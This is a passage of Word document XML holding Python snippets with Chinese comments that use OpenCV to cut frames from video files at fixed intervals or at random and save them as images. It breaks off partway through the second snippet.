    <w:p w14:paraId="1CC580D2" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t># -*- coding:UTF-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBC4F0" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726"/>
    <w:p w14:paraId="72EF246B" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t>import cv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B551907" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t>import numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AADFAA1" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">import random  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F74F191" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346423EA" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义保存图片函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2927E" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># image:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要保存的图片名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A8E04" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；图片地址与相片名字的前部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA709AB" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># num: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相片，名字的后缀。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562ABEBC" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t>def save_image(image,addr,num):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4156D" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">  address = addr + str(num)+ '.jpg'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0916DC5B" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">  cv2.imwrite(address,image)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1035CC" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ECA96E" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取视频文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C9E06" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726"/>
    <w:p w14:paraId="1DB74DCF" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t>j = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C30D1E6" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t>for m in range(10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F113EA" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">    videoCapture = cv2.VideoCapture("./datasets/video_2/" + str(m+1) + '.mp4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1695A3B2" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726"/>
    <w:p w14:paraId="05B5932C" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">    # videoCapture=cv2.VideoCapture(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DBB89B" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545DFF0" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACB48E" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">    success, frame = videoCapture.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50979888" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3774A" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    timeF = 50  #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按需更改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC44292" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">    i = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273AE270" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">    while success :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190D9EDC" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">      i = i + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A940BEE" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (i % timeF == 0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A712A" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">        s = 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF451F1" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">        j = j + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F863CA" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">        s += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219230A" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">        save_image(frame,'./datasets/images_1/',s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6961E443" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">        #print('save image:',i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7ECFEE" w14:textId="77777777" w:rsidR="00CB7726" w:rsidRDefault="00CB7726" w:rsidP="00CB7726">
      <w:r>
        <w:t xml:space="preserve">      success, frame = videoCapture.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09218720" w14:textId="77777777" w:rsidR="00634F46" w:rsidRDefault="00634F46" w:rsidP="00634F46"/>
    <w:p w14:paraId="3C4A8FD5" w14:textId="34500056" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="00F27BBE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随机切帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C475E64" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3639FE0A" w14:textId="77777777" w:rsidR="00D778E3" w:rsidRDefault="00D778E3" w:rsidP="00D778E3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cv2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开视频文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>videoCapture = cv2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>VideoCapture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>r"C:\Users\ranja\Videos\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>口语</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.mp4"</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取视频的总帧数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">total_frames = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(videoCapture.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(cv2.CAP_PROP_FRAME_COUNT))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>生成一个随机帧索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>random_frame_index = random.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>randint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, total_frames - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将视频的帧设置到随机选择的索引位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>videoCapture.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(cv2.CAP_PROP_POS_FRAMES, random_frame_index)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>读取随机帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>success, frame = videoCapture.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>read</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>如果成功读取了帧，则保存帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>success:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    address = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
